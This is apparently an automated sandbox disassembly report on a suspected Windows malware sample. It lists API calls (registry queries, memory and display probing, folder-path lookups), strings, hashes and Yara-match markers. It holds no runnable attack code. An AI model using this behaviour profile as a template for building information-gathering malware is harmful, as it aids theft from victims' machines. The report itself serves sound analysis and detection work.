                                • memmove.MSVCRT(00000000,?,?), ref: 003B5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                                • Instruction ID: 67e586fdf35cd26a7c587f7ac8fc237173023bf4c5424e11984b0c6894d14b8f
                                • Opcode Fuzzy Hash: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                                • Instruction Fuzzy Hash: 75417171B005199FCF09DF6CC891BAEBBB5EB88314F158229E909EB744D630DD008B90
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 5627c6d97a07d1e2aadbbc0d939aba231830bc41cc0bbfe62a43415f1d6a3b5b
                                • Instruction ID: 9f7b1d717b1185e95f2a73138e9edde4fa0b2e5aed140dddf8ad72395edc62a1
                                • Opcode Fuzzy Hash: 5627c6d97a07d1e2aadbbc0d939aba231830bc41cc0bbfe62a43415f1d6a3b5b
                                • Instruction Fuzzy Hash: 6421E4323186009BD722DE2CDCD1A7AF7E9EFA2754B204A2EE492CB641D770DC0087A1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 003B3411
                                • wsprintfA.USER32 ref: 003B3437
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                                • Instruction ID: a1dde2ee00bb38d689896e56f4e8e795de4db50d718193a451fffbf9ec68fdaa
                                • Opcode Fuzzy Hash: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                                • Instruction Fuzzy Hash: 2701B5B1E44614AFDB05DF98DC49FAEB7B8FB44714F000529FA06E7780DB74590086A5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00F7E5D8,00000000,00020119,?), ref: 003AD7F5
                                • RegQueryValueExA.ADVAPI32(?,00F7F448,00000000,00000000,00000000,000000FF), ref: 003AD819
                                • RegCloseKey.ADVAPI32(?), ref: 003AD823
                                • lstrcat.KERNEL32(?,00000000), ref: 003AD848
                                • lstrcat.KERNEL32(?,00F7F478), ref: 003AD85C
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                                • Instruction ID: 93812d1fe6561a3342f5484b36c7f73425ab0324c0c4cc07d4f47cebd2e93e8f
                                • Opcode Fuzzy Hash: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                                • Instruction Fuzzy Hash: 26413075A1050DAFCB55EF64EC86FEE77B8EB54304F004064B50A9B251EE34AA898F91
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A7F60
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FA5
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FD3
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8007
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d2d0c13267e88c2ff25d30f624677063886b95eec0ed59ab7190fb5f38a344f2
                                • Instruction ID: df767bf35ae0821506c0d1cec216e7f8486e63608d1599d1a491a8b68f585c89
                                • Opcode Fuzzy Hash: d2d0c13267e88c2ff25d30f624677063886b95eec0ed59ab7190fb5f38a344f2
                                • Instruction Fuzzy Hash: 9C41803060411AEFCB22DF68D8C4EAEB7B8FF55300F124599E805DB351EB74AA65CB91
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A80EA
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8102
                                • lstrlen.KERNEL32(00000000), ref: 003A8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A816F
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 47a40c51bb0ee2ff8df90ce46a28669fe2ea12e7ac0b6c173f5a41f34e980b09
                                • Instruction ID: 74276d05ab93b536494d374efa8f3ec8cf1642bd1a8d080f1b7855371b280232
                                • Opcode Fuzzy Hash: 47a40c51bb0ee2ff8df90ce46a28669fe2ea12e7ac0b6c173f5a41f34e980b09
                                • Instruction Fuzzy Hash: 6E419E71A00206AFCB22DF78D948BAABBF4EF45700F11845CA845D7204EF34DD46CB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00F6BAA8,00000000,00020119,?), ref: 003B318C
                                • RegQueryValueExA.ADVAPI32(?,00F7E558,00000000,00000000,00000000,000000FF), ref: 003B31A7
                                • RegCloseKey.ADVAPI32(?), ref: 003B31B1
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                                • Instruction ID: 528c10d76618b775ecabde3c84b083704843bc1e847fa26107dc661d3d92c56b
                                • Opcode Fuzzy Hash: ea0278763f6ec2707a6b45ec8f25c2a4343dcd538d64d3c4d6f0f337fe0fa9df
                                • Instruction Fuzzy Hash: 05115176A40615AFD710DF98DC49FBBBBBCF748B11F00426AFA09E3680DB7559048BA1
                                APIs
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: ab5a1cbaf4a76aaaa74fed684e8d32b3d6cf3e7732c77090748a87b9d9e91a92
                                • Instruction ID: a00260bf1f03b124f2494073a57c057a42615fd2bcc50eeeafcc72d5f4a289d0
                                • Opcode Fuzzy Hash: ab5a1cbaf4a76aaaa74fed684e8d32b3d6cf3e7732c77090748a87b9d9e91a92
                                • Instruction Fuzzy Hash: 6A410B7050475CAEDB338B24CD85FFB7BFC9B45308F1448E9EB868A582D2719A459F20
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 003989CD
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                                • Instruction ID: 652ae8bb307b514e51775ff6737a05bd93ba009e20aa596758c463df1496447f
                                • Opcode Fuzzy Hash: 162d0fac3ce06b546fe187b8ece78eba45843aac84ee8613b4dafab4fcd713ac
                                • Instruction Fuzzy Hash: A421A6723006505BCF229B5CE840A6AF799DBE2761B15093FF152CB641DB71DC41C3A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00398883
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                                • Instruction ID: acf9543cb6b77b2da0464b064a02adf5d3e1efbba48625676f6e4ab8ae157c53
                                • Opcode Fuzzy Hash: 869d2ea1fb38106737a7cfb65bb797e2068591e2a58b57236d6bccb7f608ea29
                                • Instruction Fuzzy Hash: 013186B5E005159BCB09DF58C8916AEBBB6EBC9350F148269E915DF344DB30AD01CB91
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5922
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                                • Instruction ID: de5b9a4e67ba1fd253120108cb07cda56cf3944150be46834906f7d380505236
                                • Opcode Fuzzy Hash: bac0b66e5d2b83ca75998f9c78d1376c281885c3f440784c9a67147c720f616d
                                • Instruction Fuzzy Hash: 70117030318B40CBD7338F2CE800B99B7E1ABD1765F250A5DE1D1CBA95CB61D841C7A1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,003BA430,000000FF), ref: 003B3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B3D27
                                • wsprintfA.USER32 ref: 003B3D37
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                                • Instruction ID: 55c8b65989e9512484d62ff8a4b292d72506d2bd8c27739f1b8ec383a3d3ceb8
                                • Opcode Fuzzy Hash: 4652168e4eb7faf669bfb9dcd6e344cab44ee44dc25c123a034d5de3de09b199
                                • Instruction Fuzzy Hash: EC01C071640B14BFE7105B54DC0EFAABB6CFB55B61F000115FA05E76D0DBB42904CAA6
                                APIs
                                • __getptd.LIBCMT ref: 003B9279
                                  • Part of subcall function 003B87FF: __amsg_exit.LIBCMT ref: 003B880F
                                • __amsg_exit.LIBCMT ref: 003B9299
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptd
                                • String ID: Xu<$Xu<
                                • API String ID: 441000147-2192574222
                                • Opcode ID: 6cb57df9cac18c84934e02a09611583a4a0f16e2af94e89867c88c65d65504cb
                                • Instruction ID: 18c12f1562963308ae14715115b55bb66aecdeb6d554f652684220404223dc08
                                • Opcode Fuzzy Hash: 6cb57df9cac18c84934e02a09611583a4a0f16e2af94e89867c88c65d65504cb
                                • Instruction Fuzzy Hash: EA01D632D05715A7D713AB698806BDDB354BF41718F16041AEB04AFD90CB307D40CBD5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00398737
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                                • Instruction ID: 147508ae3cf101fd7e86a4273ce5e46083873b1a1fc580d55aab9220d8d707fe
                                • Opcode Fuzzy Hash: 00c821110cb1b73ab6cf23c1143ecb207e132dd84e7e7069a369bcdcb83a8686
                                • Instruction Fuzzy Hash: C7F02437F000210F8706657D8C8049EA80756E239033AC725E80AEF359DC30EC8281D5
                                APIs
                                  • Part of subcall function 003B781C: __mtinitlocknum.LIBCMT ref: 003B7832
                                  • Part of subcall function 003B781C: __amsg_exit.LIBCMT ref: 003B783E
                                • ___addlocaleref.LIBCMT ref: 003B8756
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xu<$xt<
                                • API String ID: 3105635775-4126764381
                                • Opcode ID: 27de4e7ad4e49db9d86084b371b703d20e748da7ff5ba1d908287285bf108931
                                • Instruction ID: 82723a43b81e5cc7c7c037164810fdbdb328244079d6718071bb4aac3351a40b
                                • Opcode Fuzzy Hash: 27de4e7ad4e49db9d86084b371b703d20e748da7ff5ba1d908287285bf108931
                                • Instruction Fuzzy Hash: 51018875545700DAD722AF75C806789F7E0AF51318F20990DE6D59BAE1CFB4A944CB10
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AE573
                                • lstrcat.KERNEL32(?,00000000), ref: 003AE581
                                • lstrcat.KERNEL32(?,00F7E798), ref: 003AE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                                • Instruction ID: b6afa45ea108bb0932386ebe0ade823aadbb64ec622d2b997562a3695133e86e
                                • Opcode Fuzzy Hash: 4bc623de3cc40a7c7f6245247708e0e267c6216e52c0a5cb0bb91286c963b72e
                                • Instruction Fuzzy Hash: FD51B576A10518AFCB56EB64DC42EFE337DEB58300F044498FA069B241EE70AE458BA0
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003B1FDF, 003B1FF5, 003B20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                 • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
